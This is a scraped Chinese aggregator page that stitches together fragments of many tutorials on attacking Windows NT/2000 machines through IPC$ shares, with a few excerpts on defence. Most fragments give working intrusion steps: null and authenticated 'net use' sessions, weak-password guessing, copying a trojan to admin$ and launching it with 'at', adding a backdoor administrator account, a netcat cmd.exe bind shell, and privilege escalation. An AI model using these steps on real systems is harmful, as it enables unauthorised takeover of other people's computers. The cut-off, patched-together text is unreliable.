IPC$攻击及介绍

合集下载

IPC$入侵命令

IPC$入侵命令

入侵中可能会用到的命令为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。

请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。

1 建立/删除ipc$连接的命令1)建立空连接:net use \\127.0.0.1\ipc$ "" /user:""2)建立非空连接:net use \\127.0.0.1\ipc$ "密码" /user:"用户名"3)删除连接:net use \\127.0.0.1\ipc$ /del2 在ipc$连接中对远程主机的操作命令1)查看远程主机的共享资源(看不到默认共享):net view \\127.0.0.12)查看远程主机的当前时间:net time \\127.0.0.13)得到远程主机的netbios用户名列表:nbtstat -A 127.0.0.14)映射/删除远程共享:net use z: \\127.0.0.1\c此命令将共享名为c的共享资源映射为本地z盘net use z: /del删除映射的z盘,其他盘类推5)向远程主机复制文件:copy 路径\文件名\\IP\共享目录名,如:copy c:\xinxin.exe \\127.0.0.1\c$即将c盘下的xinxin.exe复制到对方c盘内当然,你也可以把远程主机上的文件复制到自己的机器里:copy \\127.0.0.1\c$\xinxin.exe c:\6)远程添加计划任务:at \\IP时间程序名如:at \\127.0.0.0 11:00 xinxin.exe注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径3 本地命令1)查看本地主机的共享资源(可以看到本地的默认共享)net share2)得到本地主机的用户列表net user3)显示本地某用户的帐户信息net user 帐户名4)显示本地主机当前启动的服务net start5)启动/关闭本地服务net start 服务名net stop 服务名6)在本地添加帐户net user 帐户名密码/add7)激活禁用的用户net uesr 帐户名/active:yes8)加入管理员组net localgroup administrators 帐户名/add很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet 成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。

ipc共享入侵

ipc共享入侵

ipc$共享入侵应红基一位朋友的要求重新整理了一下不过有点乱有时间再重编吧.基本的也就是这些了.ipc$详细解释大全目录:一前言二什么是ipc$三什么是空会话四空会话可以做什么五ipc$连接所使用的端口六ipc$连接在hack攻击中的意义七ipc$连接失败的常见原因八复制文件失败的原因九如何打开目标的IPC$共享以及其他共享十一些需要shell才能完成的命令十一入侵中可能会用到的相关命令十二ipc$完整入侵步骤祥解十三如何防范ipc$入侵十四ipc$入侵问答精选十五结束的话一前言网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack论坛搜一下ipc$,看看存在的疑惑有多少)。

因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列,而鉴于win Xp在安全设置上有所提高,个别操作并不适用,有机会将单独讨论。

二什么是ipc$IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。

NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。

ipc$ 入侵

ipc$ 入侵
2 NBT:(NETBios Over TCP/IP) 使用 137 ( UDP ) 138 ( UDP ) 139 ( TCP )端口实现基于 TCP/IP 协议的 NETBIOS 网络互联。
3 在 WindowsNT 中 SMB 基于 NBT 实现,即使用 139 ( TCP )端口;而在 Windows2000 中, SMB 除了基于 NBT 实现,还可以直接通过 445 端口实现。
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H < 1C > GROUP Registered
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?
四 空会话可以做什么
对于 NT ,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问 everyone 权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对 2000 作用更小,因为在 Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
1 首先,我们先建立一个空会话(当然,这需要目标开放 ipc$ )
命令: net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四个空格, net 与 use 中间有一个空格, use 后面一个,密码左右各一个空格。

IPC$入侵--远程磁盘映射

IPC$入侵--远程磁盘映射

IPC$入侵:远程磁盘映射IPC$介绍:IPC$是Windows系统特有的一项管理功能,是微软公司为了方便用户使用计算机而设计的,主要用来远程管理计算机的。

但事实上使用这个功能的黑客可以通过建立IPC$连接与远程主机实现通信和控制。

通过IPC$连接的建立,黑客能够做到:1 建立、拷贝、删除远程计算机文件;2 在远程计算机上执行命令。

的缩写,可以理解为“命名管道”资源,它是Windows操作系统提供的一个通信基础,用来在两台计算机进程之间建立通信连接。

而IPC后面的“$”是Windows系统所使用的隐藏符号,因此“IPC$”表示IPC共享,但是是隐藏的共享。

IPC$是Windows NT及Windows 2000/XP/2003特有的一项功能,通过这项功能,一些网络程序的数据交换可以建立在IPC上面,实现远程访问和管理计算机。

打个比方,IPC连接就像是挖好的地道,通信程序就通过这个IPC地道访问目标主机。

默认情况下IPC是共享的,除非手动删除IPC$。

通过IPC$连接,入侵者就能够实现远程控制目标主机。

因此,这种基于IPC的入侵也常常被简称为IPC入侵。

操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\WINNT\)等,即为ADMIN$、C$、D$、E$等等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。

演示:在MS-DOS中键入“net share”命令来查看本机共享资源。

如何消除默认共享?DOS命令,这些都是DOS中经常使用的命令。

DIR命令:列出当前路径下的文件,常常用来查看想要找的文件是否在该路径下。

CD命令:进入指定的目录。

比如,想进入E盘中的CODE文件夹,则在E:\>下键入“CD CODE”命令。

:系统账号类操作;net localgroup:系统组操作net use:远程连接、映射操作net send:信使命令net time:查看远程主机系统时间cls命令:清屏命令。

IPC$空连接主机的攻击技巧

IPC$空连接主机的攻击技巧

IPC$空连接主机的攻击技巧来源:115软件站IPC$的定义:IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。

在远程管理计算机和查看计算机的共享资源时使用。

IPC$的作用:利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。

2:这步要使用NET命令,如果你不懂的话建议你快学,NET可是非常强大的命令!(本人正在苦练中)如果你不懂的话就跟着我做吧。

3:如果知道了对方的用户名和密码就用下面这个命令:net use\\127.0.0.1\ipc$"密码"/user:"用户名"退出的命令是:net use\\127.0.0.1\ipc$/delte相信能知道对方用户名和密码的情况不多,详细说明就不写了,写出进入和退出命令仅供大家拿朋友的机子做做试验,熟悉一下界面4:大部分情况下我们都不知道对方机子的用户名和密码。

查他IP用ping命令,格式为:ping(空格)(如果用QQ聊天更简单,现在有QQ显IP补丁,IP一目了然),用追捕查他的操作系统,用户名等。

现在信息都有了,然后大家试试弱智点的密码,如:123,12345,123456,用户名。

运气好的话就可以进入了:)你懒得作字典的话我还有一篇《弱智密码集DIC》,可以去看看:)5:实在猜不出密码的话我们只有祭上榕哥的大作--流光!运行探测--扫描POP3/FTP/NT/SQL主机,会出现“主机扫描设置”;在“扫描范围”中分别填写“开始地址”与“结束地址”,这步你可以选择要扫描的IP段,也可以只填某一IP,扫描主机类型”选择“NT/98”,然后开始扫描,有了NT/98的机器了,(如果单扫某一IP,我建议扫描主机类型选ALL,选项选中的内容不要取消)可以看看他的机子是什么颜色的,具体表示看下表:红色:该主机安装了FrontPage扩展。

并没有权限设置。

IPC$详解

IPC$详解
IPC$详解
一:什么是ipc$
IPC$(Internet Process Connection)是共享 "命名管道 "的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
六:如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

防范ipc$攻击常用方法

防范ipc$攻击常用方法

防范ipc$攻击常用方法IPC$是Windows系统中的一种共享资源,它允许用户在不需要登录到目标计算机的情况下访问该计算机的资源。

这项功能的存在使得黑客有机会通过IPC$攻击手段获取目标电脑的控制权,威胁到用户的隐私和数据安全。

为了防范IPC$攻击,我们可以采取以下常见方法:1. 禁用IPC$共享IPC$是Windows系统默认开启的一个共享,可以通过它访问目标计算机的资源。

如果我们禁用IPC$共享,黑客就无法使用该方式进行攻击了。

禁用IPC$共享的方法有多种,可以通过修改注册表、关闭服务等方式实现。

其中最常见的方法是在Windows安全策略中禁用IPC$共享。

2. 设置强密码IPC$攻击主要是利用了Windows系统默认的空密码共享漏洞,如果我们设置了强密码,就可以有效地避免IPC$攻击。

强密码应该包含大小写字母、数字和特殊字符,并且长度应该不少于8位。

3. 禁用Guest账户Guest账户是Windows系统默认开启的一个账户,它没有密码限制,可以访问IPC$共享。

为了防范IPC$攻击,我们应该禁用Guest账户,同时建议禁用其他不必要的账户。

4. 安装杀毒软件杀毒软件可以及时发现和清除病毒、木马等恶意软件,有效保护我们的计算机安全。

如果我们安装了杀毒软件,并及时更新病毒库,就可以有效地防范IPC$攻击。

5. 定期更新系统和软件Windows系统和常用软件的更新补丁可以修复系统漏洞和安全隐患,有效提高系统的安全性。

我们应该定期检查系统和软件的更新情况,并及时安装补丁,以保证计算机的安全。

6. 使用防火墙防火墙可以阻止未经授权的访问,有效保护我们的计算机安全。

我们应该开启Windows防火墙,并设置防火墙规则,禁止不必要的入站和出站连接,以防范IPC$攻击等恶意攻击。

7. 关闭不必要的服务和端口Windows系统中有很多不必要的服务和端口,这些服务和端口可能存在安全漏洞,成为黑客攻击的目标。

5实例-基于认证的攻击IPC$入侵

5实例-基于认证的攻击IPC$入侵

17

net user sysback 123456 /add 该命令表示添加的用户名为sysback,口令 为123456的帐号
net localgroup administrators sysback /add 该命令表示把帐号sysback添加到管理员组 (administrators)

18
3

Windows操作系统的默认共享
IPC$中的’’$”是windows的隐藏符号,因此IPC$是隐藏 共享。在Windows系统安装完成后,IPC是默认共享的。 为了配合IPC$共享工作,在windows系统默认的情况下, 会自动的设置默认共享的目录为:admin$、c$、d$等。但 这些共享都是隐藏的,只有管理员可以对他们进行远程操 作。可以用net share命令查看本机的共享资源
IPC$入侵
1
主要内容

一、预备知识 二、利用IPC$入侵—远程文件操作 三、利用IPC$入侵—留取后门帐号 四、利用远程计算机管理入侵 五、利用远程注册表管理入侵


2
一、预备知识

IPC$简介 IPC$ (Internet Process Connection,共享“命名管 道”资源),用来在两台计算机进程之间建立通信连 接。可用于远程管理计算机和查看计算机的共享资源。 IPC$作为windows NT系列具有的一项特殊功能,通 过它可以实现远程访问和管理计算机。同样的,利用 这项功能,入侵者也能够实现控制远程目标主机的目 的。

24

(5)验证帐号是否成功建立 等待一段时间,估计远程主机已经执行了BAT 文件。通过与其建立IPC$连接,验证是否已经 添加了sysback帐号。

ipc$入侵

ipc$入侵

用TELNET弱口令我给你例子看好了c:\>telnet 192.168.0.1user:administratorpossword:[如果是弱口令密码可能是空的或是简单的]下面就进入他的shall了c:\>net user hacker[用户] hacker[密码自己定义] /addc:\>net localgroup administrator hacker [用户] /add这是个自己在他的计算机中建立自己的用户并提升为管理员权限还有你可以用IPC$命令攻击ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)五ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径: 网络有问题;错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。

IPC$的远程入侵和防范

IPC$的远程入侵和防范

IPC$的远程入侵和防范作者:刘若冰来源:《数字化用户》2013年第08期随着网络信息化的发展,各企业、组织为了实现远程作业需要开启远程访问,随着远程访问的开启,给恶意入侵者提供了机会,增加了内部网络被攻击的危险。

要防止企业内部网络被远程入侵,首先要了解远程入侵是如何实现的,这样才能更有效地防止被恶意用户远程入侵。

远程入侵最常使用的IPC入侵是通过使用Windows系统中默认启动的IPC$共享,来达到侵略主机,获得计算机控制权的入侵。

一、什么是IPC$IPC$(Internet Process Connection)是共享"命名管道"的资源,通过建立IPC$连接与远程主机实现通信和控制。

它是为了让进程间通信而开放的命名管道,只要有用户名和密码就可以对其进行操作,在远程管理计算机和查看计算机的共享资源时使用。

二、IPC$远程侵方法4.关闭自己的139端口,IPC和RPC漏洞存在于此。

“Internet协议(TCP/IP)”的“属性”按钮,打开“高级TCP/IP设置”对话框,单击WINS选项卡,选择“禁用TCP/IP的NETBIOS”按钮,关闭139端口。

(二)永久关闭IPC$和默认共享依赖的服务:lanmanserver即server服务。

控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用(三)安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等)。

(四)设置繁琐的用户密码,防止黑客通过IPC$窃取管理密码。

五、总结我们都会习惯性的说IPC$漏洞。

然后实际上,IPC$只是用于方便并实现管理员远程管理的一种开放的网络登陆功能,并不是真正意义上的漏洞。

但是这样会让一些别有用心的恶意入侵者利用IPC$,访问共享资源,导出用户列表,从而达到不可告人的目的。

所以在了解了IPC$入侵的原理之后,一定要对电脑做好防范操作,杜绝黑客利用IPC$入侵的可能性。

“恶意”利用IPC$

“恶意”利用IPC$

“恶意”利⽤IPC$“恶意”利⽤IPC$⽬录⽆论是默认共享还是远程计划任务都是管理员级别或是有相对应权限的账户的操作。

何为IPC$IPC$ (Internet Process Connection),共享"命名管道"的资源,它是为了让进程间通信⽽开放的命名管道,通过提供可信任的⽤户名和⼝令,连接双⽅可以建⽴安全的通道并以此通道进⾏加密数据的交换,从⽽实现对远程计算机的访问。

默认共享是管理员级别或者是有相对权限的账户的操作,同时在安全策略中可以对共享模型进⾏修改。

所谓空连接:就是在连接时指定⼀个空的⽤户名和密码net use \\IP\IPC$ "" /user:"",这样的连接是可以建⽴的,但是并没有什么权限。

利⽤IPC$⽹上多数通过IPC$进⾏攻击的例⼦都是通过远程主机开放的默认共享⽂件夹,上传⼀个⽊马⽂件,通过at命令添加计划任务的⽅式执⾏,这样可以直接得到⼀个SYSTEM权限的Shell。

但是这⾥也有⼀个要求,就是IPC$这个默认共享存在,如果对⽅主机把IPC$删除了,那么虽然可以上传⽂件,但是却没有办法通过at命令设置计划任务。

流程记录如下:1. net use \\靶机IP(或者计算机名)\ipc$探测使⽤⾃⼰的⽤户名和密码能不能连到远程主机(默认情况下该命令会使⽤当前⽤户的账户和密码进⾏尝试)2. 拷贝⽊马copy ⽊马⽂件 \\靶机\靶机路径3. at \\靶机IP 时间⽊马win7以后的版本执⾏at命令时执⾏会报:“AT命令已弃⽤,请改⽤schtasks.exe ”,不要理他,⾄少在2012之前的版本(包括2012R2)是能⽤的1. AT命令创建的任务权限为SYSTEM,也就是说shell跑起来就是SYSTEM。

2. AT命令创建的任务⼯作模式是:⽆论⽤户是否登陆都执⾏该计划任务。

3. schtasks这个命令在远程主机上创建任务时,需要⼀个在远程主机Administrators组中的⽤户。

《网络攻击与防御》专题-1:IPC$漏洞详解

《网络攻击与防御》专题-1:IPC$漏洞详解
net time \\<IP> 【得到对方时间】 at \\<IP> <指定时间> nc -l -p <端口号 > -t -e cmd.exe 【使对方在<指定时间>启 动DOS窗口,并输出到对方的<端口号>端 口。】
闪击:连接
地狱之门:登录到定时炸弹炸开的端口得 到一个shell(命令窗口) telnet <IP> <端口号>
不要高兴得太早:权限不够
渗透:提权
漏洞之后的漏洞 NT核心进程WinLogon可被非法使用, 用
来把任何用户加入管理员组。
王牌出场:运行提权程序 把提权程序getadmin.exe,gasys.dll拷到z 盘,再在shell中执行getadmin.exe。
当家作主:破坏
篡改主页 上传木马 格式化硬盘
穷举密码
IPC$漏洞
广州科技职业技术学院 黄伟
什么是IPC$?
在win NT/2000环境下 , IPC$(Inter-Process Communication),它是为了让进程间网络 通信而开放的主机间的连接。通过提供可 信任的用户名和口令,连接双方可以建立 安全的通道并以此通道进行加密数据的交 换,从而实现对远程计算机的访问。
越界:映射对方机器其他共享(例如 admin$)到本机(例如Z盘) net use z: \\<IP>\admin$
闪击:连接
瑞士军刀:上传木马程序 把黑客工具nc.exe拷到z盘 把通用DOS命令窗口工具cmd.exe拷到z盘
闪击:连接
定时炸弹:向对方机器添加定时任务,在 给定时间启动cmd.exe, 并把界面输出到指 定端口。
打扫战场:痕迹清理

基于IPC$弱口令的入侵

基于IPC$弱口令的入侵

项目一、基于IPC$弱口令的入侵【项目任务】通过扫描局域网内存活的计算机,查看存活的计算机是否存在IPC漏洞,并通过技术手段对存在IPC漏洞的计算机进行入侵活动,项目的目的是通过对IPC漏洞的入侵,最终拿到目标计算机的控制权。

(本实验以上兴远程控制控制目标机)【项目意义】计算机网络给人们带来了巨大的便利,但互联网是一个面向大众的开放系统,对信息的保密和系统的安全考虑得并不完备,存在着安全隐患,网络的安全形势日趋严峻。

通过IPC$弱口令的入侵实验,让大家了解到默认共享和弱口令潜在的危险,项目最后提供了如何防范IPC$漏洞的一些方法,以确保计算机操作系统及数据安全。

如何加强我们的网络安全防范意识,值得大家深思!【实施环境】3台或3台以上没有关闭默认共享的WINDOWS2000虚拟机。

【涉及知识点】空连接IPC$:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了IPC$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

弱口令:口令就是常说的密码,英文名是Password。

弱口令就是在计算机中使用较为简单的密码,例如“123”、“”、“123456”、“8888888”、“abc”或与用户名相同命名为密码。

【运用到的软件】啊D网络工具包,上兴远程控制【软件简介】扫描器啊D网络工具包简介1. 共享资源查找 [为你查找网上的共享资源!]2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便]3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!]4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便]5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!]6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!]7. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!]8. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626]9. 端口扫描 [使你更加了解对方主机端口的打开状况]10. 网卡MAC [快速获取一个网段的用户名、工作组、对方的网卡MAC地址]11. 网络状态查看 [想知道自己机子打开了什么端口吗?本程序可帮上你的忙!]12. 主机查询 [想知道IP的的所在地?想知道某地有哪些IP,本程序可帮上你的忙!]13. Ping [判断某IP是否和网络连接的好帮手!]14. 域名<=>IP [想知道域名对应的IP,想知道IP对应的域名,本程序可以帮助你!]15. 路由查看 [想知道某IP经过的路由?用本程序就可以给你答案!]16. Finger [Finger能为你查询对方系统的用户信息!]17. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!]18. 本机IP [在上网的时候,想知道自己的IP吗?本程序可以为你办到!]19. 常用修改 [反恶意网页修改,恢复系统设置等]20. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!]备注:要开Server和Wordstation这两个服务才行。

IPC$漏洞入侵与防御

IPC$漏洞入侵与防御

实验五 IPC$漏洞入侵与防御1、实验目的(1) 何谓IPC$漏洞的入侵(2) 掌握IPC$漏洞的入侵与防范可参照课本P214页实验8-32、实验环境两台或两台以上计算机装有Windows 2000 、XP操作系统,也可以用虚拟机。

(目前最好用windows 2000操作系统)3、实验原理为了远程网络的连接以及便于网络管理员的管理,Windows NT、Windows 2000以及Windows XP 等系统总是把C、D等盘默认共享成C$、D$,从而造成管理员的疏忽,黑客进出的通道。

4、实验要求(1) 了解IPC$漏洞(2) 了解IPC$漏洞的入侵与防范5、实验步骤(1) 何谓IPC$漏洞的入侵(见参考资料)(2) 实现IPC$漏洞扫描利用流光或啊D等工具扫描具有IPC$漏洞的主机,例如:可利用流光扫描到IPC$漏洞主机,并探测出用户名和密码。

(3) 连接到目标主机net use \\ip\ipc$“密码” /user:“用户名”如:net use \\192.168.8.175\ipc$“***” /user:“administrator”(要有准确的用户名和密码)net view \\ipnet time \\ipnbtstat –A ipnet use z: \\ip\c$如:net use z: \\192.168.8.175\c$或d$等可以向对方机子放置文件、病毒、木马。

如:copy c:\test.exe z:\hack.exe建立共享:net share ipc$net share admin$net share c$=c:net share c=c:删除空会话:net use \\ip\ipc$ /del注:也可以直接在地址栏输入:\\IP\C$(或D$、E$等),也可以看到机器上相应的内容。

如:\\192.168.8.175\c$\\192.168.8.175\d$等(4) IPC$攻击的防范。

03IPC$入侵-- 空连接漏洞

03IPC$入侵-- 空连接漏洞

IPC$入侵: 空连接漏洞
然而事实并不尽然。

IPC$空连接漏洞允许客户端只使用空用户名、空密码就可以与目标主机成功建立连接,如图所示。

但是无法执行管理类操作,例如不能执行映射网络驱动器、上传文件、执行脚本等命令。

虽然入侵者不能通过该漏洞直接得到管理员权限,但也可以用来探测目标主机的一些关键信息,在“信息搜集”中可以发挥一定作用。

步骤一:建立IPC$空连接。

如果空连接建立成功,说明该目标主机拥有漏洞。

步骤二:键入“net time \\IP”命令来查看目标主机的时间信息,如图所示。

注:入侵者也可以通过目标主机的时间信息来推断目标主机所在的国家或地区。

当然,用这种方法来判断并不是最好的方法,而且在没有建立IPC$空连接的情况下,是不可能获得主机时间信息的。

步骤三:获取目标主机上的用户信息。

主机泄露用户信息是非常严重的安全隐患。

一旦用户信息被获知,入侵者便可能通过各种方法,甚至暴力破解来得到用户密码。

例子:
X-Scan扫描器:
目标主机存在IPC$空连接漏洞, X-Scan就可以扫描出的大量信息。

IPC$攻击与防护

IPC$攻击与防护

一、什么是ipc$IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限, 从而达到不可告人的目的.解惑:1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)2)即使是空连接也不是100%都能建立成功,如果你关闭了ipc$共享,对方仍然无法建立连接3)并不是说建立了ipc$连接就可以查看用户列表,因为管理员可以禁止导出用户列表二、建立ipc$连接在hack攻击中的作用就像上面所说的,即使建立了一个空的连接,也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果能够以某一个具有一定权限的用户身份登陆的话,那么就会得到相应的权限,显然,如果以管理员身份登陆,嘿嘿,就不用我在多说了吧!!(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以开启终端服务方便控制.怎么样?够厉害吧!)不过管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的因此最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,根本就无法连接.三、 ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 当以空连接登陆时,没有任何权限,而以用户或管理员的身份登陆时,就会有相应的权限.2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)四、 ipc$连接失败的原因以下5个原因是比较常见的:1)HACKER的系统不是NT或以上操作系统;2)被攻击者没有打开ipc$默认共享3)被攻击者未开启139或445端口(或被防火墙屏蔽)4)HACKER的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径 : 网络有问题;错误号53,找不到网络路径: ip地址错误;目标未开机;目标lanmanserver 服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。

ipc$共享入侵

ipc$共享入侵

(2)使用命令net use \\xxx.xxx.xxx.xxx\ipc$“密码” /user:“用户名”建立一个有一定权限的ipc$连接。用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 将木马程序的服务器端复制到系统目录下。
(3)用net time \\xxx.xxx.xxx.xxx 命令查看对方操作系统的时间,然后用at \\202.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。 这样一来,你的电脑就完全被黑客控制了。
ipc$共享入侵
微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令,那就更可怕了。一条典型的入侵流程如下:
